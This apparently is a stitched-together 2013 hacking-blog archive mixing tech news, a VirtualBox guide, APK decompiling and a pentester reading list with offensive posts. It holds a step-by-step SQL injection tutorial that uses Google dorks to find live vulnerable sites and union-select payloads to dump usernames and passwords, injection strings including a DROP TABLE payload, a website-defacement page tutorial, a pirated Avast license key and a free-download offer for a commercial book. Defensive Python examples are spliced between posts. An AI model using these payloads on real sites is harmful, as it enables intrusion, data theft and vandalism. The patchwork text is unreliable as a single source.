Tuesday, 15 October 2013

HOW INJECTION ATTACKS WORK

Injection attacks are based on a single problem that persists in many technologies: namely, no strict separation exists between program instructions and user data (also referred to as user input). This problem allows attackers to sneak program instructions into places where the developer expected only benign data. By sneaking in program instructions, the attacker can instruct the program to perform actions of the attacker's choosing.

To perform an injection attack, the attacker attempts to place data that is interpreted as instructions in common inputs. A successful attack requires three elements:


• Identifying the technology that the web application is running. Injection attacks are heavily dependent on the programming language or hardware possessing the problem. This can be accomplished with some reconnaissance or by simply trying all common injection attacks. To identify technologies, an attacker can look at web page footers, view error pages, view page source code, and use tools such as nessus, nmap, THC-amap, and others.

• Identifying all possible user inputs. Some user input is obvious, such as HTML forms. However, an attacker can interact with a web application in many ways. An attacker can manipulate hidden HTML form inputs, HTTP headers (such as cookies), and even backend Asynchronous JavaScript and XML (AJAX) requests that are not seen by end users. Essentially all data within every HTTP GET and POST should be considered user input. To help identify all possible user inputs to a web application, you can use a web proxy such as WebScarab, Paros, or Burp.

• Finding the user input that is susceptible to the attack. This may seem difficult, but web application error pages sometimes provide great insight into what user input is vulnerable.

The easiest way to explain injection attacks is through example. The following SQL injection example provides a solid overview of an injection attack, while the other examples simply focus on the problem with the specific language or hardware.





Attackers use SQL injection to do anything from circumventing authentication to gaining complete control of databases on a remote server.

SQL, the Structured Query Language, is the de facto standard for accessing databases. Most web applications today use an SQL database to store persistent data for the application. It is likely that any web application you are testing uses an SQL database in the backend. Like many languages, SQL syntax is a mixture of database instructions and user data. If a developer is not careful, the user data could be interpreted as instructions, and a remote user could perform arbitrary instructions on the database.

Consider, for example, a simple web application that requires user authentication. Assume that this application presents a login screen asking for a username and password. The user sends the username and password over some HTTP request, whereby the web application checks the username and password against a list of acceptable usernames and passwords. Such a list is usually a database table within an SQL database.

A developer can create this list using the following SQL statement:

-------------------------------------------------------------------------------------------
CREATE TABLE user_table (
  id INTEGER PRIMARY KEY,
  username VARCHAR(32),
  password VARCHAR(41)
);
-------------------------------------------------------------------------------------------


This SQL code creates a table with three columns. The first column stores an ID that will be used to reference an authenticated user in the database. The second column holds the username, which is arbitrarily assumed to be 32 characters at most. The third column holds the password, which contains a hash of the user's password, because it is bad practice to store user passwords in their original form.

We will use the SQL function PASSWORD() to hash the password. In MySQL, the output of PASSWORD() is 41 characters.

Authenticating a user is as simple as comparing the user's input (username and password) with each row in the table. If a row matches both the username and password provided, then the user will be authenticated as being the user with the corresponding ID. Suppose that the user sent the username lonelynerd15 and password mypassword. The user ID can be looked up:
-------------------------------------------------------------------------------------------
SELECT id FROM user_table WHERE username='lonelynerd15' AND
password=PASSWORD('mypassword')
-------------------------------------------------------------------------------------------


If the user was in the database table, this SQL command would return the ID associated with the user, implying that the user is authenticated. Otherwise, this SQL command would return nothing, implying that the user is not authenticated.

Automating the login seems simple enough. Consider the following Java snippet that receives the username and password from a user and authenticates the user via an SQL query:

-------------------------------------------------------------------------------------------
// Read the raw, untrusted values from the HTTP request.
String username = req.getParameter("username");
String password = req.getParameter("password");

// The query is built by string concatenation: the user input becomes
// part of the SQL text, which is exactly what makes this injectable.
String query = "SELECT id FROM user_table WHERE " +
               "username = '" + username + "' AND " +
               "password = PASSWORD('" + password + "')";

ResultSet rs = stmt.executeQuery(query);

int id = -1; // -1 implies that the user is unauthenticated.
while (rs.next()) {
    id = rs.getInt("id");
}
-------------------------------------------------------------------------------------------
The first two lines grab the user input from the HTTP request. The next line constructs the SQL query. The query is executed, and the result is gathered in the while() loop. If a username and password pair match, the correct ID is returned. Otherwise, the id stays -1, which implies the user is not authenticated.

If the username and password pair match, then the user is authenticated. Otherwise, the user will not be authenticated, right?

Wrong! There is nothing stopping an attacker from injecting SQL statements in the username or password fields to change the SQL query.
Let's re-examine the SQL query string:

-------------------------------------------------------------------------------------------
String query = "SELECT id FROM user_table WHERE " +
               "username = '" + username + "' AND " +
               "password = PASSWORD('" + password + "')";
-------------------------------------------------------------------------------------------

The code expects the username and password strings to be data. However, an attacker can input any characters he or she pleases. Imagine if an attacker entered the username ' OR 1=1 -- and the password x; then the query string would look like this:
-------------------------------------------------------------------------------------------
SELECT id FROM user_table WHERE username = '' OR 1=1 -- ' AND password
= PASSWORD('x')
-------------------------------------------------------------------------------------------

The double dash (--) tells the SQL parser that everything to the right is a comment, so the query string is equivalent to this:

-------------------------------------------------------------------------------------------
SELECT id FROM user_table WHERE username = '' OR 1=1
-------------------------------------------------------------------------------------------


The SELECT statement now acts much differently, because it will now return IDs where the username is a zero length string ('') or where 1=1; but 1=1 is always true! So this statement will return all the IDs from user_table.

In this case, the attacker placed SQL instructions (' OR 1=1 --) in the username field instead of data.



Choosing Appropriate SQL Injection Code

To inject SQL instructions successfully, the attacker must turn the developer's existing SQL instructions into a valid SQL statement. For instance, single quotes must be closed. Blindly doing so is a little difficult, and generally queries like these work:

-------------------------------------------------------------------------------------------
• ' OR 1=1 --
• ') OR 1=1 --
-------------------------------------------------------------------------------------------
Also, many web applications provide extensive error reporting and debugging information. For example, attempting ' OR 1=1 -- blindly in a web application often gives you an educational error message like this:

-------------------------------------------------------------------------------------------
Error executing query: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near 'SELECT (title, body) FROM blog_table WHERE
cat='OR 1=1' at line 1
-------------------------------------------------------------------------------------------

This particular error message shows the whole SQL statement. In this case, it appears that the SQL database was expecting an integer, not a string, so the injection string OR 1=1 --, without the preceding apostrophe, would work.

With most SQL databases, an attacker can place many SQL statements on a single line as long as the syntax is correct for each statement. For the following code, we showed that setting username to ' OR 1=1 -- and password to x returns the last user:

-------------------------------------------------------------------------------------------
String query = "SELECT id FROM user_table WHERE " +
               "username = '" + username + "' AND " +
               "password = PASSWORD('" + password + "')";
-------------------------------------------------------------------------------------------

However, the attacker could inject other queries. For example, setting the username to this,

-------------------------------------------------------------------------------------------
' OR 1=1; DROP TABLE user_table; --
-------------------------------------------------------------------------------------------

would change the query to this,

-------------------------------------------------------------------------------------------
SELECT id FROM user_table WHERE username='' OR 1=1; DROP TABLE
user_table; -- ' AND password = PASSWORD('x');
-------------------------------------------------------------------------------------------

which is equivalent to this:

-------------------------------------------------------------------------------------------
SELECT id FROM user_table WHERE username='' OR 1=1; DROP TABLE
user_table;
-------------------------------------------------------------------------------------------

This statement will perform the syntactically correct SELECT statement and erase the user_table with the SQL DROP command.
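As an added, runnable illustration of both the ' OR 1=1 -- case and the stacked DROP TABLE case above (this is not the book's code), the login logic of the Java snippet is reproduced in Python against an in-memory SQLite copy of user_table, once with the string concatenation the book shows and once with bound parameters. SQLite has no PASSWORD() function, so a hypothetical fake_password() is registered under that name purely so the query text can match the Java line for line; it is not a real hash. The sqlite3 module executes only one statement per call, so the stacked DROP payload cannot be reproduced against the concatenated query here; it is shown instead against the parameterized query, where it is plain data and the table survives.

```python
import sqlite3


def fake_password(pw: str) -> str:
    """Hypothetical stand-in for MySQL's PASSWORD(). SQLite has no such
    function, so this toy transform is registered under that name. It is
    NOT a real password hash; it exists only so the query text below can
    match the page's Java snippet character for character."""
    return "H:" + pw[::-1]


def make_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory copy of the page's user_table."""
    con = sqlite3.connect(":memory:")
    con.create_function("PASSWORD", 1, fake_password)
    con.execute(
        "CREATE TABLE user_table ("
        " id INTEGER PRIMARY KEY, username VARCHAR(32), password VARCHAR(41))"
    )
    con.executemany(
        "INSERT INTO user_table VALUES (?, ?, PASSWORD(?))",
        [(1, "lonelynerd15", "mypassword"), (2, "alice", "s3cret"), (3, "bob", "hunter2")],
    )
    return con


def login_concat(con: sqlite3.Connection, username: str, password: str) -> list:
    """Vulnerable: mirrors the Java snippet, splicing user input into SQL text."""
    query = ("SELECT id FROM user_table WHERE "
             "username = '" + username + "' AND "
             "password = PASSWORD('" + password + "')")
    return [row[0] for row in con.execute(query)]


def login_param(con: sqlite3.Connection, username: str, password: str) -> list:
    """Hardened: placeholders keep the input as data; the SQL text never changes."""
    query = "SELECT id FROM user_table WHERE username = ? AND password = PASSWORD(?)"
    return [row[0] for row in con.execute(query, (username, password))]


def table_exists(con: sqlite3.Connection, name: str = "user_table") -> bool:
    """True if the named table is still present (used to show DROP never ran)."""
    row = con.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "lonelynerd15", "mypassword"))  # [1]: a normal login
    print(login_concat(db, "' OR 1=1 --", "x"))            # [1, 2, 3]: every id leaks
    print(login_param(db, "' OR 1=1 --", "x"))             # []: the same input is just a string
    print(login_param(db, "' OR 1=1; DROP TABLE user_table; --", "x"))  # []
    print(table_exists(db))                                # True: the table survives
```

The hardened version does not change the SQL text at all; the difference is that the driver sends the username and password as values, so the quote and the comment marker never reach the parser as syntax. The same fix applies to the Java original through JDBC's PreparedStatement.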



Injection attacks are not necessarily blind attacks. Many web applications are developed with open-source tools. To make injection attacks more successful, download free or evaluation copies of products and set up your own test system. Once you have found an error in your test system, it is highly probable that the same issue will exist on all web applications using that tool.








Set Up VirtualBox

★ How To Set Up VirtualBox - Beginner ★

Here I will explain how to set up a virtual machine and in this case it's VirtualBox. There are many benefits to having a virtual box. It allows you to run another OS inside your current OS. You can also use it to test viruses/bots/keyloggers without having to worry about the infection spreading. Think of it as a disposable computer. Sandbox but on a much larger scale.

For this tutorial you will need:

  • VirtualBox
  • ISO, CD or bootable USB with the operating system of your choice.



[Image: eEVuw.png][Image: vak2t.gif]

Start off by downloading the VirtualBox installer. You can download it from the official site. Once installed, run VirtualBox and you'll be presented with the screen above.

Click on new and you'll be asked to choose your operating system that you're using. You can see the various options that are on offer. Choose the one you are installing and give your operating system a name. This doesn't have to relate to the operating system, it's just a name you pick like for a user profile.

[Image: WJINj.png]

Here you choose the amount of RAM to assign to the virtual operating system. Make sure the amount of RAM assigned is enough for the operating system, while also ensuring that your PC will not be under strain. I suggest not going over half of your total RAM. If you have 4GB installed, assign no more than 2GB to your virtual box.

[Image: iVF5j.png][Image: 2LwsG.png][Image: 4j6xS.png]

We're making a new machine here, so we'll pick the middle option. Here you'll also pick the type of virtual hard drive file. Don't worry too much about what each option does; the one I've selected will do fine. If you pick dynamically allocated space it just means the size of the virtual disk file will increase as you go along, and if you picked fixed size it will stay the same until you change it yourself.

[Image: KyfpU.png][Image: FK9Nv.png]

Once you've picked the size of your hard drive, you'll be presented with the final few steps. Press the Start button on this window.

[Image: gvTLC.png][Image: tpvDZ.png][Image: Q6ibf.png]

Click the folder icon and you'll be asked to pick a file. Choose your ISO & press start. Follow on-screen instructions to finalize the setup.

Troubleshooting:

Q: The internet on my Virtualbox doesn't work.

A: Make sure you installed the network adapter during install, make sure it installed properly and make sure your physical and virtual adapter are allowed to communicate.

Q: System error: Bootable media not found.

A: See the screenshot below; you need to make sure VirtualBox is able to access the bootable media.

[Image: QoQAL.gif]

Sunday, 13 October 2013

Make your own Deface Page!

Today I will teach you guys the basics of making your very own deface pages. It will teach you the basics to create your own unique defaces.


Preview:
[Image: capturemnm.png]

Step #1:

The first step is to create the file structure that we are going to use. Now remember, this is proper HTML coding and should always be used; it keeps things neat and professional.
This should be done in a text editor, like Notepad or Notepad++.

[Image: capturepzz.png]


Code:
==================================================================
<HTML> </HTML> - The HTML tags specify that this is a valid HTML document.
==================================================================

Code:
==================================================================
<HEAD> </HEAD> - Specifies the head of the document, where you do all the styling and declaring of divs, links, etc.
==================================================================

Code:
==================================================================
<TITLE> HACKED! </TITLE> - Specifies the title of the HTML page.
==================================================================

Code:
==================================================================
<BODY> </BODY> - The body tags hold the majority of the deface page code.
==================================================================

Step #2:

Create a header and some text under the header. This has to be done inside the "<body>" tags, nowhere else.
[Image: capturegw.png]

==================================================================
Code:

<CENTER> </CENTER> - Aligns all content between the tags directly in the middle.
==================================================================
Code:

<H1> </H1> - Is the biggest header tag; there are other levels such as h2 and h3.
==================================================================
Code:

<PRE> </PRE> - These tags display the content between them exactly as it is written.
==================================================================

As you can see, all the content that we want displayed on the deface page is within the <body> tags! This is very important!
Step #3:

The final step. Here is where we are going to style the deface page to give it a unique feel and appearance.
[Image: capturexwp.png]

==================================================================
Code:

<style type="text/css">

h1 {
color: #ddd;
font-size: 60pt;
}
</style>
==================================================================

This is CSS (Cascading Style Sheets); it styles whatever is declared, which in this case is the content within the <h1> tags. Two changes have been made: we changed the color to #ddd and the font-size to 60pt.

If you want to add images/pictures to a deface page, this can be done easily with the <img> tag.

==================================================================
Code:

<img src="http://www.linktoimage.com/" alt="Picture">
==================================================================

And if you want to add a YouTube video to your deface page, that's easy as well!

==================================================================
Code:

<embed src="http://www.youtube.com/v/VIDEOIDHERE&autoplay=1&replay=1" width="1px" height="1px">
==================================================================

Avast 8 License Key.

Avast 8 License Valid Till 2038

Nothing to say in detail about Avast antivirus; it is one of the most popular antivirus programs. Are you looking for the Avast License Key Valid Until 2038 download link? Yes, now I will give you the Avast License Key Valid Until 2038.

Avast Features:

>> Avast antivirus has streaming and real-time virus database updates.
>> It has a file reputation system.
>> Avast has a management portal system.
>> Avast contains a remote assistance tool.
>> Avast has customizable installation.

Avast License Key Valid until 2038:

W6754380R9978A0910-4TZ59467

Saturday, 12 October 2013

Android 4.4 KitKat detailed again in new Nexus 5 photo leak

Purported photos of Google's next flagship Nexus phone crop up showing what looks like a final version of Android 4.4 KitKat.


(Credit: Tutto Android)


Ahead of the much-anticipated debut of Android 4.4 KitKat are even more shots of Google's next flagship Nexus phone and the OS update.

Italian tech site Tutto Android has an extensive gallery of the device with notes on what's new or different. That list includes tweaked voice-activated search, a new camera shortcut from the lock screen, a different app drawer, and a camera that appears to use image stabilization.

The photos come a week after an extensive leak from tech blog GadgetHelpLine, which posted a gallery of 4.4 shots showing new features like wireless display support, cellular phone plan settings, and new printing and payment options.

Google announced the name of its next Android OS update last month, surprising some by licensing the popular candy bar namesake from Nestle. It follows July's release of Android 4.3 Jelly Bean, which was introduced in late July alongside Google's Nexus 7 tablet.

Google's expected to take the full wraps off the OS update at an event this month.

Hacking Exposed Web 2.0

Web 2.0 Security Secrets and Solutions

Book Description
Protect your Web 2.0 architecture against the latest wave of cybercrime using expert tactics from Internet security professionals. Hacking Exposed Web 2.0 shows how hackers perform reconnaissance, choose their entry point, and attack Web 2.0-based services, and reveals detailed countermeasures and defense techniques. You'll learn how to avoid injection and buffer overflow attacks, fix browser and plug-in flaws, and secure AJAX, Flash, and XML-driven applications. Real-world case studies illustrate social networking site weaknesses, cross-site attack methods, migration vulnerabilities, and IE shortcomings.

Book Details
Publisher: McGraw-Hill
By: Rich Cannings, Himanshu Dwivedi, Zane Lackey
ISBN: 978-0-0714-9461-8
Year: 2007
Pages: 258
Language: English
File size: 6.9 MB
File format: PDF

eBook
Download: Free

Friday, 11 October 2013

SQL injection Tutorial

FOR EDUCATIONAL PURPOSES

Finding vulnerable sites
Finding amount of columns
Getting MySQL version and current user
Getting Databases
Getting Tables
Getting Columns
Getting Usernames and Passwords






1. Finding vulnerable sites

To find vulnerable sites you are going to use Google dorks.

Some common dorks are:

====================================================================
Code:

inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=
=================================================================

Let's say you got this site:

=============================================
Code:

http://site.com/news/view.php?id=828
============================================

If we add a ' before or after the numbers it should look something like this if it's vulnerable:



2. Finding amount of columns

To find the right amount of columns we are using "order by". Here is how it works:

===============================================================
Code:

http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)
===============================================================

This means our site has 8 columns and we will now move over to "union select".

This is how it works:

===============================================================
Code:

http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--
===============================================================

Note the hyphen - before the numbers!

This should make the website show some numbers on the screen like this:

===============================================================

This means it is certain that the site is vulnerable to SQL injection.


3. Getting MySQL version and Current User

Now we want to know the MySQL version. If it's over 5 then it's injectable by this tutorial (if it's under 4 then you have to guess tables and columns).

===============================================================
Code:

http://site.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--
===============================================================

To get the current user you type this:

===============================================================
Code:

http://site.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--
===============================================================

This should display:

4. Getting Databases

Now we want to find the databases and the current database.

Here is the syntax for all databases:

===============================================================
Code:

http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--
===============================================================

It should display something like this:

Now we would like to know what the current database is; it's pretty obvious in this case but useful sometimes.

Syntax for current database:

===============================================================
Code:

http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8
===============================================================

This should display something like this:

5. Getting Tables

Now we want to know the tables in the database, and for this we will continue using "union select".

===============================================================
Code:

http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--
===============================================================

This should display something like this:

We now know that the table that passwords should be stored in is called bpusers; write it down and move on.

6. Getting Columns

Now we want to know the columns.

============================================================
Code:

http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--
============================================================

This should display something like this:

7. Dumping users/pass

Now you would like to dump logins and passwords from bpusers.

Here is the code for that:

==================================================================
Code:

http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--
======================================================

(NOTE: 0x3a will make a : between logins and passwords.)

You have now performed a SQL injection attack.
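From the defender's side, the walkthrough above leaves a recognisable trail in the web server's access log: a stray quote on a numeric parameter, an ascending series of order by N probes, and union select statements that reference @@version, information_schema or group_concat. The following Python scanner is an added example, not part of the tutorial: it runs those indicators over a constructed common-format access log (the request strings reuse the probes shown above; the client addresses are RFC 5737 documentation ranges) and reports which lines, and which client, tripped them.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access log (common log format). The request strings
# reuse the probes shown in the tutorial above; the addresses are from the
# RFC 5737 documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Oct/2013:10:01:02 +0000] "GET /news/view.php?id=828 HTTP/1.1" 200 5120
203.0.113.5 - - [11/Oct/2013:10:01:09 +0000] "GET /news/view.php?id=828' HTTP/1.1" 500 312
203.0.113.5 - - [11/Oct/2013:10:01:15 +0000] "GET /news/view.php?id=828%20order%20by%209-- HTTP/1.1" 500 312
203.0.113.5 - - [11/Oct/2013:10:01:21 +0000] "GET /news/view.php?id=-828+union+select+1,2,@@version,4,5,6,7,8-- HTTP/1.1" 200 4870
203.0.113.5 - - [11/Oct/2013:10:01:30 +0000] "GET /news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8+from+information_schema.schemata-- HTTP/1.1" 200 4901
198.51.100.7 - - [11/Oct/2013:10:02:00 +0000] "GET /forum.php?tid=42 HTTP/1.1" 200 2210
"""

# Each indicator corresponds to one stage of the walkthrough above and is
# matched against the URL-decoded, lower-cased query string.
INDICATORS = [
    ("order-by probing", re.compile(r"\border\s+by\s+\d+")),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("db fingerprint", re.compile(r"@@version|\buser\(\)|\bdatabase\(\)")),
    ("information_schema", re.compile(r"\binformation_schema\.")),
    ("group_concat", re.compile(r"\bgroup_concat\(")),
    ("stray quote", re.compile(r"=\s*-?\d+'(?:\s|&|$)")),
]

# client, identd, user, [timestamp], "METHOD path HTTP/x"
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')


def decoded_query(request_path: str) -> str:
    """Percent-decode and '+'-decode the query string so encoded probes still match."""
    return unquote_plus(urlsplit(request_path).query).lower()


def scan_log(text: str) -> list:
    """Return (line_no, client_ip, [indicator names]) for each suspicious request."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # malformed or non-GET/POST line: skip it rather than crash
        client, path = m.group(1), m.group(2)
        query = decoded_query(path)
        names = [name for name, rx in INDICATORS if rx.search(query)]
        if names:
            hits.append((line_no, client, names))
    return hits


def clients_by_hit_count(hits: list) -> dict:
    """Aggregate per client: one source walking through several stages is the signal."""
    counts = {}
    for _, client, names in hits:
        counts[client] = counts.get(client, 0) + len(names)
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for line_no, client, names in found:
        print(f"line {line_no} {client}: {', '.join(names)}")
    print(clients_by_hit_count(found))
```

Because the probes arrive URL-encoded (%20 or +), matching on the raw log line would miss them, so the scanner decodes the query string first. The per-client aggregation matters more than any single hit: a lone quote can be a typo, but one source moving through every stage in sequence is the pattern worth alerting on.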

Get source code from apk file

What is an .apk file?
An APK file is an Android Package file. APK is the file format used to distribute and install application software and middleware on Google's Android operating system.

APK files are ZIP-formatted packages based on the JAR file format, with the .apk extension. An APK file contains all program resources and code, i.e. it contains .dex files, resources, assets, certificates, and the manifest file.

How to get source (java files) from an .apk file?

As we now know that an apk file is just a zip file containing all program resource files, we can get Java code from apk files with ease. Following are the steps to get Java code from apk files.

Step 1: Renaming the .apk file
  • Rename the .apk file with the extension .zip (for example, let the file be "demofile.apk"; after renaming it becomes "demofile.apk.zip").

Step 2: Getting java files from the apk

  • Now extract the renamed zip file into a specific folder, for example "demofolder".
  • Now download dex2jar from the link for Windows and extract that zip file into the folder "demofolder".
  • Now open a command prompt, go to the folder created in the previous step, type the command "dex2jar classes.dex" and press Enter. This will generate a "classes.dex.dex2jar" file in the same folder.
  • Now download the Java decompiler from the link, extract it and start (double-click) jd-gui.exe.
  • From the jd-gui window browse to the generated "classes.dex.dex2jar" file in demofolder; this will give all the class files by src name.
  • Now from the File menu select "save all sources"; this will generate a zip file named "classes_dex2jar.src.zip" consisting of all packages and java files.
  • Extract that zip file (classes_dex2jar.src.zip) and you will get all java files of the application.

The above steps will generate java files, but to get xml files perform the following steps.

Step 3: Getting xml files from the apk

  • Download apktool and apktool install from the link, extract both files and place them in the same folder (for example "demoxmlfolder").
  • Place the .apk file in the same folder (i.e. demoxmlfolder).
  • Now open a command prompt, go to the directory where apktool is stored (here "demoxmlfolder") and type the command "apktool if framework-res.apk".
  • The above command should result in "Framework installed ...".
  • Now in the command prompt type the command "apktool d filename.apk" (where filename is the name of the apk file).
  • This will generate a folder named filename in the current directory (here demoxmlfolder) where all xml files will be stored in the res\layout folder.
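The steps above rename the file to .zip and extract it. Because an APK is already a zip container, it can also be opened in place, which is the quicker first check before handing the file to dex2jar or apktool. The following Python snippet is an added example and not part of the original post: build_sample_apk() constructs a minimal APK-shaped archive in memory (placeholder bytes, not real bytecode or a real manifest) so the script runs offline, and inspect_apk() lists the members a triage would look for without extracting anything.

```python
import io
import zipfile


def build_sample_apk() -> bytes:
    """Constructed sample: a minimal APK-shaped zip built in memory.
    Real APKs carry a compiled (binary XML) manifest and real dex bytecode;
    these members hold placeholder bytes only, apart from the dex magic."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"<placeholder binary xml>")
        # Every dex file starts with "dex\n", a three-digit version and a NUL.
        z.writestr("classes.dex", b"dex\n035\0" + b"\0" * 64)
        z.writestr("classes2.dex", b"dex\n035\0" + b"\0" * 32)
        z.writestr("res/layout/main.xml", b"<placeholder>")
        z.writestr("resources.arsc", b"\0" * 16)
        z.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
        z.writestr("META-INF/CERT.SF", b"Signature-Version: 1.0\n")
        z.writestr("META-INF/CERT.RSA", b"\x30\x82placeholder")
    return buf.getvalue()


def inspect_apk(data: bytes) -> dict:
    """Summarise an APK's contents without renaming or extracting it."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        raise ValueError("not a zip container, so not an APK")
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        # Top-level classes*.dex hold the compiled code dex2jar would convert.
        dex = sorted(n for n in names if n.endswith(".dex") and "/" not in n)
        # META-INF/*.RSA, *.DSA or *.EC are the v1 (JAR) signature blocks.
        sig = sorted(
            n for n in names
            if n.startswith("META-INF/") and n.endswith((".RSA", ".DSA", ".EC"))
        )
        layouts = sorted(n for n in names if n.startswith("res/layout/"))
        total = sum(info.file_size for info in z.infolist())
        dex_magic_ok = all(z.read(n)[:4] == b"dex\n" for n in dex)
    return {
        "has_manifest": "AndroidManifest.xml" in names,
        "dex_files": dex,
        "dex_magic_ok": dex_magic_ok,
        "signature_blocks": sig,
        "layout_files": layouts,
        "uncompressed_bytes": total,
        "member_count": len(names),
    }


if __name__ == "__main__":
    for key, value in inspect_apk(build_sample_apk()).items():
        print(f"{key}: {value}")
```

On a real file, pass its bytes directly: inspect_apk(open("demofile.apk", "rb").read()). A missing manifest, a dex member without the "dex\n" magic, or no signature block at all are each worth noting before any decompilation, since they indicate a damaged or tampered package rather than a normal build.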

Wednesday, 9 October 2013

BECOMING A PENETRATION TESTER


WHERE TO BEGIN ON THE PATH TO BECOMING A PENETRATION TESTER


What you will need:

1) Books
2) Virtual Machines (or physical machines)
3) Operating Systems
4) Hardware
5) Software
6) Basics


So, let us begin with the most important part: the books. Now, most people here will tell you that you should hack to learn, not learn to hack, but you actually need to do BOTH simultaneously. To do this, you need books/knowledge of what it is you want to do, some form of tutorial or article on how it is done/ideas of where to start, and access to a virtual lab to try out new things.

Books You'll Need:

TCP/IP Illustrated, Volume 1: The Protocols
This book should give you a fairly good grasp on basic concepts of networking. You will also want to look into staying anonymous on the internet, so do some research into using Tor and I2P.

Nmap Network Scanning
This book will give you an in-depth look into the most popular and most effective port scanning tool.

Beginning PenTesting with Kali Linux
This book will give you a very good idea of the different tools in Kali Linux and will give you a great start on information gathering and how to approach gaining access into a system through different avenues and attack vectors.

Command Line Course
This book will take you through the basics in command line usage for both Windows PowerShell and the Linux command line.

Python Cookbook
Violent Python
Assembly Programming for Intel x64 Processors
Intel Assembly Developer Manuals
Learning Perl
Programming in C
PHP and MySQL Web Development

Those would be the basic primers for languages that you will encounter and eventually need to know in order to change code or edit and write your own exploits.
There are multitudes of other available books, but these are some high quality ones that are recommended.


Virtual Machines:

There are two main software programs to run virtual machines in. One is the open source VirtualBox and the other is the commercial VMware. Either program should be sufficient for basic lab testing. People use both, so you should always find someone who can help you.

Having your own personal lab to test on is vital. You should not test on real world machines because they can land you in serious trouble. Always make sure you have permission. The virtual environment will allow you to watch first hand what happens on both sides of the action. Plus, if something goes amiss, you can simply revert and tweak. You should be using Kali Linux (not BackTrack) as your attacking machine in your lab. You can use intentionally vulnerable VMs such as Metasploitable, Damn Vulnerable Web Application, and Damn Vulnerable Linux. You should also get images for the operating systems below, as you'll have to gain knowledge on a wide spectrum of operating systems if you intend to be a decent penetration tester.


Operating Systems:
Server 2003
Server 2008 (R2)
Server 2012
Windows XP
Windows 7
Windows 8
Mac OSX
Ubuntu Server
RHEL

You will encounter every single one of these in the wild. You should become familiar with them, read about them, and break them.

Hardware:

You should obtain a firewall, as you'll need something that can block off your test network from the rest of your network. This provides a fairly close setup to what the real world offers. It lets you see what data can bypass the firewall, and you can see what happens when someone port scans, requests data, etc. This can also help you practice avoiding intrusion detection systems (IDS).

Software:

Two pieces of software that aren't covered in the Kali book are Currports and Wireshark. Currports can be used to show you your active ports on Windows machines. It will show where your ports are going and pointing to; it will also help you get an idea of what services default to where so you can identify the points of attack. Wireshark is a program that sniffs all network traffic so that you can watch the packets fly back and forth in real time. Other software is better covered in the Kali book.

Basics:

Basic configuration for most networks:
[Image: Network.jpg]

The firewall will act as the main filter between the target network and the internet. Should this be compromised, the attacker will have full access to the internal network. A second, but less filtered, firewall between the wireless and the internal network can act as another nuisance to help thwart an attacker.

The target network's public IP address(es) is/are the link(s) between the attacker and the target network. Once you know the address(es), you can begin a port scan. This will show you what services are running on the open ports, what operating systems are running those services, and whether there are any vulnerabilities. There are often multiple public IP addresses associated with a network, so it is advisable to scan a range of IP addresses to find several points of entry.

If you are unsure of the target network's IP address(es), you can try to ping their domain names (such as mail.companyname.com) to find them. Once you have found a domain name, you can run an nmap scan such as "nmap -vv -sV -Pn -T2 domain.companyname.com" to gather additional information.

Once you have solid information on their network, you can move on to vulnerability scanners such as Nessus, Nexpose, or OpenVAS to find vulnerabilities in the network. They can tell you whether a network is vulnerable. They will also provide you with more information on how to fix that vulnerability and/or how to exploit it, where possible.

Sunday, 6 October 2013

The Galaxy Gear

Samsung is the first major tech company out of the gate with a modern wearable device, the Galaxy Gear.

The Galaxy Gear is a $300 Android-powered watch with a 1.6-inch touchscreen. It only works if you tether it to Samsung's new Galaxy Note 3 smartphone or Galaxy Note 10.1 tablet using Bluetooth, but Samsung says it's working to add compatibility for other Galaxy devices.
I've been using the Galaxy Gear for five days, but didn't find it to be nearly as useful as I had hoped.
How It Works

The Gear setup process is pretty awkward. You have to clip it into a special charging module, then tap the contraption to the back of your Galaxy Note 3. This triggers the Note 3 to download a special app called Gear Manager that lets you control the watch. Gear Manager is what you'll need to adjust just about everything on the watch from notifications to installed apps. Without the phone, the Gear can't do much more than show you the time until you pair it again.

[Image: Steve Kovach/Business Insider] The Galaxy Gear only works with a special app on the phone.

